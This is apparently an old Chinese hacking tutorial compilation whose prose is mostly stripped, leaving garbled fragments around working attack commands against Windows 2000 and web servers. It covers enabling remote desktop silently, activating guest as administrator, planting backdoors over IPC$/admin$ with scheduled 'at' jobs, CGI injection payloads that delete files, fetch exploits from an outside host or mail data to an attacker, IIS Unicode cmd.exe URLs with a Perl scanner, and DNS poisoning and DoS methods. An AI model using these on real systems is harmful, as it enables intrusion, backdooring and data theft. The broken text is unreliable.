C:\> dir c:\sysocmgr.* /s //
c:\WINNT\system32 2000-01-10 20:00 42,768 sysocmgr.exe
1 42,768
----------------------------------------------------
c:\>echo [Components] > c:\wawa
c:\>echo TSEnable = on >> c:\wawa
//
c:\>type c:\wawa
[Components]
TSEnable = on
//

-----------------------------------------------------
c:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\wawa /q


----------------------------------------------------
.
/R

/R

.,,

,
3389 ..

: A

,/R,

,
:iisreset /reboot

,
, , .B

, .C sysocmgr

,
,, sysocmgr ,,
.,

B .

C ,?

( )

WIN2000

WIN2000

WIN2000

WIN2000
3389

WIN2000

WIN2000

3389

WIN2000
CTRL+SHIFT

URL

WIN2000
"c:\winnt\system32"
SYSTEM32

"net.exe""net.exe"
> >c:\winnt\system32\net.exe "user guest
/active :yes" net.exe

guest
"user add"
guest
"user guest " guest
localgroup administrators guest /add guest

id

ip

"guest" guest

Microsoft

net use \\IP Address\IPC$ ["password"] /user:"guset" IPC


Telnet
Tools Srv.exe, ntml.xex
Telnet

99
copy c:\hack\srv.exe \\***.***.***.***\admin$

net time \\***.***.***.***

\\***.***.***.*** 2001/1/8 08:55

srv.exe:
at \\***.***.***.*** 09:00 srv.exe

ID = 0
telnet ***.***.***.*** 99

c:\winnt:\system32>

copy c:\hack\ntlm.exe \\211.21.193.202\admin$


hack ntlm.exe telnet
ntlm.exe
C:\WINNT\system32>ntlm

Windows 2000 Telnet Dump, by Assassin, All Rights Reserved.


Done!
C:\WINNT\system32>
C:\WINNT\system32>
WIN2000 telnet srv.exe telnet
net stop telnet telnet

net start telnet telnet


telnet

23 guest

net.exe winnt\system32\logfiles

14



http://www.91one.net/dvbbs/dispbbs.asp?boardID=14&ID=403

Port Mapping
Internet
Internet FTP
IP IP

IP
Internet IP IP
Internet

PM

http://www.pconline.com.cn/pcedu/soft/lan/jywgl/10301/127157.html

Remote Administrator
http://www.pcworld.com.cn/2002/back_issues/2205/0533e.asp
http://www.skycn.com/soft/15592.html

20cn

scanipc

http://down.yqdown.com/xdown/yqdown0316/scanipc.rar

IP
opentelnet TELNET
http://www.infosw.com/down/software.asp?id=1520

telnet
, 23 !
Opentelnet :
OpenTelnet.exe \\server <> <>
:
C:\>OpenTelnet.exe \\192.168.1.2 administrator 123456 1 90

administrator 123456
NTLM

:1( 0 )

90
Disconnecting server...Successfully!
90

Telnet
Telnet 192.168.1.2 90

WinShell(

http://www.hktk.com/soft/soft_server/winshell.html) winshell
FTP
:
c:\>ftp
ftp>openwww.cnwill.com
mput c:\cnwill.exe
Telnet 192.168.1.2 90
( )

net

net user \\192.168.1.2 90\ipc$ "" /user:"administrator"


[ IPC$ ]
copy d:\zilong.exe \\192.168.1.2 90\admin$\system32
[ ]
copy d:\long.exe \\192.168.1.2 90\admin$\system32
[ ]
copy d:\scoks.exe \\192.168.1.2 90\admin$\system32
[ SCOKS ]
copy d:\zilong.reg \\192.168.1.2 90\admin$\system32
[ REG ]
net time \\192.168.1.2 90
[ ]
at \\192.168.1.2 90 13:20 zilong.exe
[a t ]
==============
, IPC ,.
=============
telnet 192.168.1.2 90
[ ]
net user **** /add
[ guest]
net localgroup administrators **** /add
[ , ]
regedit /s c:\winnt\system32\zilong.reg
[ ]
,,
.
SOCKS -install
[ socks ]

SCOKS -config starttype 2


[ SOCKS ]
socks -config port 1080
[ socks 1080 ]
net start skserver
[ SOCKS ] QQ IP

long
[ , ]
15
telnet

telnet,,,
*, telnet ,
telnet, telnet?Telnet /
Telnet
?
, : Telnet

Telnet
Telnet

Ip
Telnet 4
1 TCP

Ip
2
NVTNet Virtual Terminal
IP
3 NVT

4 TCP

Telnet ? Telnet TCP/IP

Internet
Telnet

1Telnet

2Telnet

3Telnet Telnet

,,,

Win2000 Telnet , 2000


Win2000 Telnet Telnet.exe
Clienttlntsvr.exe server Telnet

tlntadmn.exe Win2000 Telnet


HELP
.Windows 2000

Telnet HELP
Telnet
AllowTrustedDomain 1
0:
DefaultDomain
"."
DefaultShell shell %systemroot
%\System32\Cmd.exe /q /k
MaxFailedLogins
3
LoginScriptTelnet
%systemroot%\System32\login.cmd
Telnet
NTLMNTLM 2
0: NTLM

1: NTLM
2: NTLM

TelnetPorttelnet

telnet 23

tlntadmn.exeTelnet
Telnet 1
2 NTLM

telnet NTLM
NTLM win2000

telnet

NTLM NTLM
NTLM
SMB "LAN Manager
Challenge/Response"LM

WindowsNT / NTLM

NTLMv2 Kerberos
NTLM
1
2

3 16
challenge
4 challenge
response

5 challenge

response

6 SAM
challenge
7

challenge
NTLM

Telnet

A B

A xinxin 1234 B
Administrator 5678 Telnet B NTLM
7 xinxin 1234

Administrator 5678

Telnet NTLM

3 Telnet

1)
=0
=====================================
Microsoft (R) Windows (TM) Version 5.00 (Build 2195)
Welcome to Microsoft Telnet Service
Telnet Server Build 5.00.99201.1
login:
password:
\\ 0 NTML
Administrator 5678
2)
=1
=====================================
NTLM Authentication failed due to insufficient credentials. Please login with clear text username and password
Microsoft (R) Windows (TM) Version 5.00 (Build 2195)
Welcome to Microsoft Telnet Service
Telnet Server Build 5.00.99201.1
login:
password:
\\ NTLM

3)
=2
=====================================
NTLM Authentication failed due to insufficient credentials. Please login with clear text username and password


Server allows NTLM authentication only
Server has closed connection

C:\>
\\

NTLM

1 telnet 2 1
0
2 NTLM.exe telnet

1
3 telnet

4 opentelnet.exe
IPC
5 RTCS

IPC
5

telnet

OpenTelnet.exe

\\server

username

password

NTLMAuthor

telnetport
OpenTelnet.exe \\

0 1 telnet

cscript RTCS.vbe targetIP username password NTLMAuthor


telnetport
cscript RTCS.vbe < IP> <

> <> <

>
telnet ? ,
1

,,
1

type
c:\boot.ini pro server

2 tftp
telnet ipc
net share ipc$

copy
shell(
)TFPT TFTP
TFTP(Trivial File Transfer Protocol)
UDP Windows tftp.exe TFTP

TFTP Server
tftpd32.exe telnet

shell
C:\>tftp i ip get xinxin.exe c:\abc\xinxin.exe
ip ip TFTP
xinxin.exe c abc

tftp
IP
IP
MAC
TFTP
3

, .

asp

telnettelnet shell
( copy ,)
1

cmd telnet

3389

'hacking'

ipc$

5

()
,,,
16

2


SID ,
SAM\Domains\Account \Users F

admin F F

SAM

http://www.91one.net/dvbbs/dispbbs.asp?boardid=17&id=1427


ca.exe

http://www.hejie.net/xz/list.asp?id=926
SYSTEM

psu.exe
www.sometips.com/soft/psu.exe
17

PING
ping
C:\>ping 10.1.1.2
Pinging 10.1.1.2 with 32 bytes of data:
Reply from 10.1.1.2: bytes=32 time<10ms TTL=128
Reply from 10.1.1.2: bytes=32 time<10ms TTL=128
Reply from 10.1.1.2: bytes=32 time<10ms TTL=128
Reply from 10.1.1.2: bytes=32 time<10ms TTL=128
Ping statistics for 10.1.1.2:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
C:\>
C:\>ping 10.1.1.6
Pinging 10.1.1.6 with 32 bytes of data:
Request timed out.
Reply from 10.1.1.6: bytes=32 time=250ms TTL=237
Reply from 10.1.1.6: bytes=32 time=234ms TTL=237
Reply from 10.1.1.6: bytes=32 time=234ms TTL=237
Ping statistics for 10.1.1.6:
Packets: Sent = 4, Received = 3, Lost = 1 (25% loss),
Approximate round trip times in milli-seconds:
Minimum = 234ms, Maximum = 250ms, Average = 179ms

ICMP TTL TTL=125


windows TTL=235 UNIX
10.1.1.2 win2000 10.1.1.6
UNIX SunOS 5.8 ICMP
TTL 1 TTL

TTL

1 80

telnet 80

C:\>telnet 10.1.1.2 80
get

HTTP/1.1 400 Bad Request


Server: Microsoft-IIS/5.0
Date: Fri, 11 Jul 2003 02:31:55 GMT
Content-Type: text/html
Content-Length: 87
The parameter is incorrect.

C:\>
windows

Method Not Implemented


get to / not
supported.
Invalid method in request get
Apache/1.3.27 Server at gosiuniversity.com Port 80

C:\>
UNIX

2 21

FTP
C:\>ftp 10.1.1.2

Connected to 10.1.1.2.
220 sgyyq-c43s950 Microsoft FTP Service (Version 5.0).
User (10.1.1.2:(none)):
win2000

sgyyq-c43s950
FTP windows IIS FTP

Connected to 10.1.1.3.
220 Serv-U FTP Server v4.0 for WinSock ready...
User (10.1.1.3:(none)):
windows Serv-U FTP windows
FTP

Connected to 10.1.1.3.
220 ready, dude (vsFTPd 1.1.0: beat me, break me)
User (10.1.1.3:(none)):
UNIX
3 23 telnet

Microsoft (R) Windows (TM) Version 5.00 (Build 2195)


Welcome to Microsoft Telnet Service
Telnet Server Build 5.00.99201.1
login:
windows

SunOS 5.8
login:
UNIX SunOS 5.8

TCP/IP
TCP/IP TCP/IP

nmap,

http://www.linuxeden.com/download/indexsoft.php?
category=syssecure

superscan
http://www.xfocus.net/tools/200206/ 1.0.5.zip
18
FTP SQL

FTP FTP
FTP

FTP FTP

FTP
FTP
FTP
UNIX

FTP

^^^)
FTP

FTP
FTP ftp -v -d -i -n -g [

]
-v
-n
ftp .netrc
-d
-g
FTP ():
1.![cmd[args> shell exit ftp !
ls*.zip
2.$ macro-name[args] macro-name
3.account[password]

4.append local-file[remote-file]

5.ascii

ascii
6.bell
7.bin
8.bye ftp
9.case

mget
10.cd remote-dir

11.cdup
12.chmod mode file-name
file-name
mode chmod 777 a.out
13.close ftp ( open )
14.cr

ascii

15.delete remote-file
16.debug[debug-value]
deb up 3 0 debug
17.dir[remote-dir][local-file]

18.disconnect (same as close)
19.form format format file

20.get remote-file[local-file]

remote-file
local-file
21.glob mdeletemgetmput

-g

22.hash
1024 hash (#)
23.help[cmd]ftp cmd help get
24.idle[seconds][seconds]
25.image(binary)
26.lcd[dir] dir
27.ls[remote-dir][local-file] remote-dir
local-file
28.macdef macro-name macdef

29.mdelete[remote-file]
30.mdir remote-files local-filedir
mdir *.o.*.zipoutfile
31.mget remote-files
32.mkdir dir-name

33.mls remote-file local-filenlist


34.mode[modename] modename
stream

35.modtime file-name
36.mput local-file

37.newer file-name file-name

38.nlist[remote-dir][local-file]
local-file
39.nmap[inpattern outpattern]
nmap $1.$2.$3[$1$2].[$2$3]
a1.a2.a3 a1a2 UNIX

40.ntrans[inchars[outchars>
ntrans1R LLL RRR
41.open host[port]ftp
42.passive
43.prompt
44.proxy ftp-cmd

ftp ftp
ftp

open
45.put local-file[remote-file] local-file
46.pwd
47.quitbye ftp
48.quote arg1arg2...

ftp
quote syst.
49.recv remote-file[local-file]get
50.reget remote-file[local-file]

get local-file

51.rhelp[cmd-name]
52.rstatus[file-name]

53.rename[from][to]
54.reset
55.restart marker marker get put restart
130
56.rmdir dir-name

57.runique.
1.2

58.send local-file[remote-file]put
59.sendport PORT

60.site arg1arg2...

SITE ftp

61.size file-namesite idle 7200


62.status ftp
63.struct[struct-name] struct-name
stream

64.sunique( runique )
65.system
66.tenex TENEX
67.tick
68.trace
69.type[type-name] type-name ascii
:type binary
70.umask[newmask]

umask newmask umask


3
71.user user-name[password][account]
user anonymous my@email
72.verbose

-v ftp
on.
73.?[cmd]help.
FTP
FTP ,!!
FTP .
anonymous ftp

Anonymous FTP
@ FTP

/etc/passwd /etc/group
FTP FTP
E-mail passwd
@ E-mail

FTP

chroot
FTP FTP

FTPFTP

FTP
chroot

FTP inetd
FTP chroot

chrootuid

FTP

chroot
FTP
FTP

/etc/passwd
telnet ftp21 SITE
CHMOD SITE EXEC/home FTP
****

FTP scanner

http://sorry.vse.cz/~xmicm08/FTPScanner/
FTP Scanner

:Host
,Beginning , IP

IP.Ending IP
. IP.

Threads

. Moden 50--70 .
100

. Session Begin FTP scan .

View options
Login config
UserName Password

Oracle
Oracle UserName Password
IP Logging

iplog.txt

ftp> get /etc/passwd
shell OK

anonymous

IP
19
80

80 ,,.
( host
)
1'.' '..' '...'
web web
web
CGI '..'
Example:
http://host/cgi-bin/lame.cgi?file=../../../../etc/motd
motd web

2'%20'
%20 16
web

Example:
http://host/cgi-bin/lame.cgi?page=ls%20-al|
unix

3'%00'
%00 16 web

Examples:
http://host/cgi-bin/lame.cgi?page=index.html

cgi

http://host/cgi-bin/lame.cgi?page=../../../../etc/motd
cgi
html.shtml

http://host/cgi-bin/lame.cgi?page=../../../../etc/motd%00html
cgi

4'|'
unix

Example:
# cat access_log| grep -i '..'
..
web IDS


http://host/cgi-bin/lame.cgi?page=../../../../bin/ls|

http://host/cgi-bin/lame.cgi?page=../../../../bin/ls%20-al%20/etc|
unix /etc
http://host/cgi-bin/lame.cgi?page=cat%20access_log|grep%20-i
%20'lame'
cat

grep

lame'
5';'
unix
Example:
# id;uname -a

id
uname
web IDS
web IDS
6'<' '>'

Example 1:
# echo 'your hax0red h0 h0' >> /etc/motd motd
)
web
RDS exploit web

Example 2:
http://host/something.php=Hi%20mom%20Im%20Bold!
html

web


16
7'!'

SSI (Server Side Include)

Example:
http://host1/something.php=
host2
host1
16
web

Example:
http://host/something.php=
id' web

id
nobody'www'

Example:
http://host/something.php=
.htpasswd ,Apache
.ht SSI
8 ' web PHP
php

Example: http://host/something.php=
php web

9'`'
perl web

Example:
http://host/something.cgi=`id`
perl

cgi id
,,

,.,
'/bin/ls'
web

web
cgi,asp,php...etc)

Example:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/ls%20-al|
http://host/cgi-bin/bad.cgi?doh=ls%20-al;
'cmd.exe'
windows shell,
windows
80
http://host/scripts/something.asp=../../WINNT/system32/cmd.exe
?dir+e:
'/bin/id'
2

/bin/ls

Example:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/id|
http://host/cgi-bin/bad.cgi?doh=id;
'/bin/rm'

Examples:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/rm%20-rf%20*|
http://host/cgi-bin/bad.cgi?doh=rm%20-rf%20*;
'wget and tftp'
wget unix

tftp unix nt

IIS tftp

Examples:
http://host/cgi-bin/bad.cgi?doh=../../../../path/to-wget/wget
%20http://host2/Phantasmp.c| http://host/cgi-bin/bad.cgi?doh=wget
%20http://www.hwa-security.net/Phantasmp.c;
'cat'

Examples:

http://host/cgi-bin/bad.cgi?doh=../../../../bin/cat

%20/etc/motd| http://host/cgi-bin/bad.cgi?doh=cat%20/etc/motd;
'echo'
index.html
Examples:

http://host/cgi-bin/bad.cgi?doh=../../../../bin/echo

%20'fc-#kiwis%20was%20here'%20>>%200day.txt| http://host/cgibin/bad.cgi?doh=echo%20'fc-#kiwis%20was%20here'%20>>
%200day.txt;
'ps'

Examples:

http://host/cgi-bin/bad.cgi?doh=../../../../bin/ps%20-

aux| http://host/cgi-bin/bad.cgi?doh=ps%20-aux;
'kill and killall'
unix

exploit
Examples: http://host/cgi-bin/bad.cgi?doh=../bin/kill%20-9%200|
http://host/cgi-bin/bad.cgi?doh=kill%20-9%200;
'uname'
web
isp

uname

-a


Examples:

http://host/cgi-bin/bad.cgi?doh=../../../../bin/uname

%20-a| http://host/cgi-bin/bad.cgi?doh=uname%20-a;
'cc, gcc, perl, python, etc...' /

wget tftp exploitcc,gcc

Examples:

http://host/cgi-bin/bad.cgi?doh=../../../../bin/cc

%20Phantasmp.c|

http://host/cgi-bin/bad.cgi?doh=gcc

%20Phantasmp.c;./a.out%20-p%2031337;
perl python
perl ,python
'mail'

Examples:

http://host/cgi-bin/bad.cgi?doh=../../../../bin/mail

%20attacker@****cnhonker.org%20<
20
sniffer
sniffers()

internet .
.
2

1 sniffer 2 sniffer

sniffer

, ,
. "" ,
,. sniffer
,
.
lan/wan

sniffers
.

sniffers,

, .

sniffers
sniffers Sniffer Pro
snoop UNIX

GOOGLE BAIDU www.yahoo.com
sniffer

, sniffer .

, sniffers.
(

),

.""
,
sniffer
.
"".
, .Sniffer
,
.

AntiSniff

()
http://www.pdasky.com.cn/down.asp?id=2876&no=1

21
?
.

mac

tcp/ip
ip .

*tcp/ip
OSI TCP/IP OSI 7

tcp/ip 5

()

HUB (
) HUB
HUB mac


promiscuous

promiscuous

,
1



,
2

dns

dns DNS

ping

, COPY , ,:
00:30:6E:00:9B:B9, ip
192.168.1.1, icmp
00:30:6E:00:9B:9B, 192.168.1.1


ip ip ping

arp
,arp icmp ,
arp
arp

( ARP? ARP , Address Resolution Protocol


, MAC
. IP MAC
ARP IP
MAC )

, www.google.com sniffer tools .

Windows
Windump http://www.xfocus.net/tools/200108/238.html

http://security.zz.ha.cn/windump.html
NT

98 98
ME NT
UNIX
Sniffit http://www.programsalon.com/download.asp?type_id=53 6
http://www.xfocus.net/articles/200001/28.html
22
IIS5 UNICODE
2

unicode

,,
,administrator !
10 ,

.
()unicode
,,

!
UNICODE BUG UNICODE
%c1%1c -(0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = '\'
%c0%2f -(0xc0 - 0xc0) * 0x40 + 0x2f = 0x2f = '/'
NT4 /%c1%9c . :WIN2000 %c0%af
UNICODE "/""\""../",
unicode

ip

/scripts/..

%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
c .
()unicode

IUSR_machinename
Everyone Users Web

!
()unicode
1
!

, IE http://

ip/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
c
., dir+c:\ set ,

PATH_TRANSLATED=c:\inetpub\wwwroot (
).

c:\inetpub\wwwroot !
,
CMD.EXE

c:\inetpub\scripts ,

,echo

:,,

?
( gale),
cmd.exe
c:\inetpub\scripts , gale.exe gale ( q:)
q:

.
,
,,

, ?
:
echo

ip/scripts/gale.exe?/c+echo+open+ ip>.txt

ip/gale.exe?/c+echo+>>.txt

ip/gale.exe?/c+echo+>>.txt

ip/gale.exe?/c+echo+get+index.htm>>.txt

ip/gale.exe?/c+echo+bye>>.txt

ip/gale.exe?/c+ftp+-s:.txt
copy

()unicode

, ,

unicode

perl


#!/usr/bin/perl
#Root Shell Hackers
#piffy
#this is a quick scanner i threw together while supposedly doing homework in my room.
#it will go through a list of sites and check if it gives a directory listing for the new IIS hole
#it checks for both %c0%af and %c1%9c
#perhaps a public script to do some evil stuff with this exploit later...h0h0h0
#werd: all of rsh, 0x7f, hackweiser, rain forest puppy for researching the hole =]
use strict;
use LWP::UserAgent;
use HTTP::Request;
use HTTP::Response;
my $def = new LWP::UserAgent;
my @host;
print "root shell hackers\n";
print "iis cmd hole scanner\n";
print "coded by piffy\n";
print "\nWhat file contains the hosts: ";
chop (my $hosts=<STDIN>);
open(IN, $hosts) || die "\nCould not open $hosts: $!";
# read the host list, one host per line; $a indexes it, $b counts it
while (<IN>)
{
$host[$a] = $_;
chomp $host[$a];
$a++;
$b++;
}
close(IN);
$a = 0;
print "ph34r, scan started";
while ($a < $b)
{
# first probe: the %c0%af encoding
my $url="http://$host[$a]/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\\";
my $request = new HTTP::Request('GET', $url);
my $response = $def->request($request);
if ($response->is_success) {
print $response->content;
open(OUT, ">>scaniis.log");
print OUT "\n$host[$a] : " . $response->content;
close OUT;
} else {
print $response->error_as_HTML;
}
&second();
}
# second probe: the %c1%9c encoding, then advance to the next host
sub second() {
my $url2="http://$host[$a]/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\\";
my $request = new HTTP::Request('GET', $url2);
my $response = $def->request($request);
if ($response->is_success) {
print $response->content;
open(OUT, ">>scaniis.log");
print OUT "\n$host[$a] : " . $response->content;
close OUT;
} else {
print $response->error_as_HTML;
}
$a++;
}

$url $url2

:
winnt

winnt win2000 c:\winnt.

"http://$host[$a]/scripts/..

%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\"
url ""

perl

, winnt/2000

?,

:
cmd.exe
cmd.exe *
winnt/win2000

,
web
C:\InetPub\wwwroot c:\inetpub

scripts
web
e:\netroot C:\inetpub
., unicode , web
d , d , QQ :"!
,
!~~",!, ,(:
,

, !).

internet ,

, web
,.

, web

80 108
unicode

, ip
, (:

,.

.)
3

iusr_server

UNICODE


iusr_server

iusr_server

guest

iusr_server

NTFS web

iusr_server
iusr_server web

4
.

,, unicode , web

,"cmd.exe"

,:
admin
unicode ,

,.,(:
:admin :1234),.,*

, . 8 ,

,:g&A$l#e7 ,,

,
,,.

,
,

,()
23

log

:)log IP IP

.QQ ICQ
.ftp
.mail
.telnet
.

.(

IRC

wingates proxies
windows sock
.

wingate

wingates

1080 socks

wingatescan
http://www.cyberarmy.com/lists/wingate

. wingate
.

purpose
http://www.buffy.nu/article.php3?id_article=3043
socks server : 127.0.0.1 port 8000.
'socks version 5'.'resolve all names remotely'.

'supported authentication'

new socks

.
socks chainer
http://www.ufasoft.com/socks
service , new name Chainport 8000
new

wingates IP

1080

'<' '>', socks.


socks.
.

http://cavency.virtualave.net/cgi-bin/env.cgi
http://internet.junkbuster.com/cgi-bin/show-http-headers

telnet

telnet
ftp.cztc.edu.cn
https://sites.inka.de:8001/cgi-bin/pyca/browser-check.py
SSL
FTP ftp.zedz.net FTP

IP
chain IP

SkSockServerSSS
wingate
1/ Sock SSS
255

2/ Sock SSS

..

webmaster

sock

webmaster sniffer
SSS
3/ sock SSS

ok
sock Tcp Udp
SSS
COPY

A SSS
SSS
SSS

-install NT SSS
-remove SSS.
-debug snake debug

sksockserver install
sksockserver
net start skserver skserver A

Ok A

B
B IE SSS~~2IP

B sockservercfg

vc sockservercfg, mfc
XXXX mfc42.dll
B X:\winnt\system32
sockservercfg 3 4 5

3SSS

SSS SnakeSo lazy!


4SSS client

5SSS IP A Ip
bActive

bActive Snake!!!
Too too lazy! Add.

ok SocksCap

http://www.youngzsoft.com/cn/sockscap/
SocksCap Sock IP A , SocksCap
telnet,ftp,ntshell,IE

:
C,D,E.....
n A 3389
SSS

24
2003
()

http://main.huigezi.com/main.asp

http://main.huigezi.com/main.asp

IP (

)
P_Client.exe (

)
Server.exe (

!)
(P_Client.exe)

!
!

1. !
IP !

!
!

!.126.com
!
E-Mail !(
!)
!!

!
!
!

!
Server.exe
()


!!

! !
!


2003
2003

XP

IPC

SUPERSCAN

IE

QQ

25
DNS

Internet DNS bind ,

bind

bind 4.9.5+P1 bind 8.2.2-P5 . bind ,


BIND (Cache)
, .(
BIND?BIND ISC Internet

)
1>.DNS
DNS , DNS

,,DNS

:
unix Internet

, rlogin , IP 123.45.67.89,

DNS (/etc/resolv.conf

DNS ) IP 98.76.54.32,(IP
38.222.74.2) unix

rlogin

, unix

/etc/hosts.equiv

dns , unix

IP 98.76.54.32 DNS
PTR :
123.45.67.89 -> 98.76.54.32 [Query]
NQY: 1 NAN: 0 NNS: 0 NAD: 0
QY: 2.74.222.38.in-addr.arpa PTR

IP 98.76.54.32 DNS ,,
DNS 38.222.74.2 38.222.74.10 74.222.38.in-addr.arpa. DNS
, 38.222.74.2 PTR :
98.76.54.32 -> 38.222.74.2 [Query]
NQY: 1 NAN: 0 NNS: 0 NAD: 0
QY: 2.74.222.38.in-addr.arpa PTR
,38.222.74.2 IP, .
DNS ,:
38.222.74.2 -> 98.76.54.32 [Answer]
NQY: 1 NAN: 2 NNS: 2 NAD: 2
QY: 2.74.222.38.in-addr.arpa PTR
AN: 2.74.222.38.in-addr.arpa PTR trusted.host.com
AN: trusted.host.com A 38.222.74.2
NS: 74.222.38.in-addr.arpa NS ns.sventech.com
NS: 74.222.38.in-addr.arpa NS ns1.sventech.com
AD: ns.sventech.com A 38.222.74.2
AD: ns1.sventech.com A 38.222.74.10
98.76.54.32 DNS ,
123.45.67.89, rlogin unix

( :) ), 98.76.54.32
DNS .
unix

IP 38.222.74.2

trusted.host.com, unix
/etc/hosts.equiv , rlogin ,,

.
unix ,,PTR ,PTR

A , IP :
123.45.67.89 -> 98.76.54.32 [Query]
NQY: 1 NAN: 0 NNS: 0 NAD: 0
QY: trusted.host.com A
, 98.76.54.32 DNS ,

2.74.222.38.in-addr.arpa

98.76.54.32 -> 123.45.67.89 [Answer]


NQY: 1 NAN: 1 NNS: 2 NAD: 2
QY: trusted.host.com A
AN: trusted.host.com A 38.222.74.2
NS: 74.222.38.in-addr.arpa NS ns.sventech.com
NS: 74.222.38.in-addr.arpa NS ns1.sventech.com
AD: ns.sventech.com A 38.222.74.2
AD: ns1.sventech.com A 38.222.74.10
unix

38.222.74.2 trusted.host.com ,

IP : Internet DNS , ,
DNS ,

.
2>. Denial of service
, 38.222.74.2 ,
98.76.54.32 DNS 2.74.222.38.in-addr.arpa ,:
74.222.38.in-addr.arpa ,

.
38.222.74.2 -> 98.76.54.32 [Answer]
NQY: 1 NAN: 2 NNS: 2 NAD: 2
QY: 2.74.222.38.in-addr.arpa PTR
AN: 2.74.222.38.in-addr.arpa PTR trusted.host.com
AN:www.company.com A 0.0.0.1
NS: 74.222.38.in-addr.arpa NS ns.sventech.com
NS: 74.222.38.in-addr.arpa NS ns1.sventech.com
AD: ns.sventech.com A 38.222.74.2
AD: ns1.sventech.com A 38.222.74.10
,98.76.54.32 DNS

www.company.com ,
IP !
3>. Theft of services
,:
38.222.74.2 -> 98.76.54.32 [Answer]

NQY: 1 NAN: 3 NNS: 2 NAD: 2


QY: 2.74.222.38.in-addr.arpa PTR
AN: 2.74.222.38.in-addr.arpa PTR trusted.host.com
AN: www.company.com CNAME www.competitor.com
AN: company.com MX 0 mail.competitor.com
NS: 74.222.38.in-addr.arpa NS ns.sventech.com
NS: 74.222.38.in-addr.arpa NS ns1.sventech.com
AD: ns.sventech.com A 38.222.74.2
AD: ns1.sventech.com A 38.222.74.10
,http://www.competitor.com
, ( .:) ).
company.com mail.competitor.com.(
! xxbin ).
4>.

,.
, ., 98.76.54.32
DNS www.company.com CNAME ,
www.competitor.com .,, A , DNS

www.company.com A 1.2.3.4, DNS www.company.com A


4.3.2.1, www.company.com A ,

.(,
loading balance ?)
,DNS

, www.netbuddy.org TTL 7200, DNS


www.netbuddy.org 7200 .
TLL 604800 A , ,

,
DNS

"".

:
A can add
NS can add
MX can add
PTR cannot add

CNAME cannot add


,

ping ping of death

TCP/IP ICMP 64KB



ICMP 64K
TCP/IP
TCP/IP

windows98

windows,NT(service
pack 3 )linuxSolaris Mac OS

ping of
death ICMP

teardrop
TCP/IP IP
IP
TCP/IPservice
pack 4 NT

UDP UDP flood


TCP/IP Chargen Echo
Chargen

UDP
Echo

TCP/IP
Internet UDP
SYN SYN flood

DDOS

TCP/IP ACK

SYN

SYN

Land

Land SYN
SYN-ACK
ACK

Land UNIX

NT

10 127 192.168 172.16 172.31


Smurf

smurf
ICMP ping

ICMP

ping
of death Smurf

ICMP

Fraggle
Fraggle Smurf UDP
ICMP

UDP

NetBIOSTelnet NFS

NFSNetBIOS Telnet

NetBus BackOrifice BO2k,

netcatVNCpcAnywhere


TCP

strcpy(),strcat()

SafeLibtripwire

ping

ICMP

TCP

host
unreachable

RESET SYN-ACK DNS
NAT
host unreachableICMP


10

NT Solaris TCP/IP

Banner

DNS
DNS
DNS
IP

Finger

finger finger

finger IP

LDAP

LDAP
LDAP
LDAP LDAP DMZ
4
DNS

DNS

DNS

DNS DNS

SMTP

PGP

:http://www.91one.net/dvbbs/dispbbs.asp?boardid=17&id=699
26
DDOS

DDOS

http://www.91one.net/dvbbs/dispbbs.asp?boardID=16&ID=698
1------ ping ping of death teardrop UDP
UDP flood
SYN SYN flood--

DDOS
Land Smurf Fraggle
2
3
4

DDOS
DDOS

DDOS

DDoS DoSDoS Denial of


Service
DoS

Internet

DoS
DoS
DoS 1
1 DoS


DDoS DoS
DoS

CPU

DoS
-

""
3,000 10,000

DDoS DoS
10
10

100
DDoS
DDoS

G 2.5G

DDoS

TCP

, DDoS 2 3
4
DDoS
3 2
2 3

DDoS

"
" DDoS
,
1.
2.

DDoS
"

" DDoS

DDoS

1.

DDoS

http://www.WWWW.com

www yahoo http://www.WWW.com

66.218.71.87
66.218.71.88
66.218.71.89
66.218.71.80
66.218.71.81
66.218.71.83
66.218.71.84
66.218.71.86
DDoS 66.218.71.87
www
http://www.WWW.com IP
IP
IP
DDoS

DDoS

2 5

DDoS
*

2.

DDoS

DDoS DDoS



cgiUnicodeftp
()

DDoS
ftp DDoS

3.
2

"

~ ~!"

DDoS

""


ping

SYN Flood
SYN-Flood DDoS

DoS
SYN-Flood

SYN-Flood
Syn Flood -
Syn Flood

TCP/IP

TCP Syn Flood


TCP
TCP SYN
TCP

ISNTCP ISN (SYN )

TCP (ACK )

ISN(ACK )

TCP
Syn Flood
SYN
SYN+ACK ACK
SYN+ACK
SYN
Timeout 30 -2
1

----

CPU
IP SYN+ACK

TCP/IP
---

TCP

SYN Flood SYN

1Trinoo
Trinoo 4 UDP

IP

27665/TCP

27444/UDP

31335/UDP
2TFN
TFN
SYN Ping UDP SMURF
3TFN2K
TFN2K TFN TFN TFN2K

TFN ICMP Mix Targa3
TFN2K
4Stacheldraht
Stacheldraht TFN

TFN
RFC2267
Stacheldrah

DDoS

DDoS
1


ICP UDP

2DDoS

DDoS

DDoS

TCP/IP TCP/IP DDoS


DDoS 1,000


DDoS
DDoS

ISPICP

WWW
DDoS

DoS

Syn
Syn time out

DDoS

SYN
IP
DDoS

.
Cisco

Cisco Express ForwardingCEF


unicast reverse-path
ACL
SYN
ISO
log server

CEF Unicast
IOS
Cisco startup config running
config running config
startup config
copy start run
ISP / ICP
ISP / ICP
DDoS

""

- DDoS ISP

ISP

ISP
ISP

27

iis

IIS iis
iis IIS iis

web telnet

web

(80)

PUT /dir/my_file.txt HTTP/1.1


Host: iis-server
Content-Length: 10
100( )
HTTP/1.1 100 Continue
Server: Microsoft-IIS/5.0
Date: Thu, 28 Feb 2002 15:56:00 GMT
10
AAAAAAAAAA
201 Created
HTTP/1.1 201 Created
Server: Microsoft-IIS/5.0
Date: Thu, 28 Feb 2002 15:56:08 GMT
Location: http://iis-server/dir/my_file.txt
Content-Length: 0
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, LOCK, UNLOCK
403
401(

web
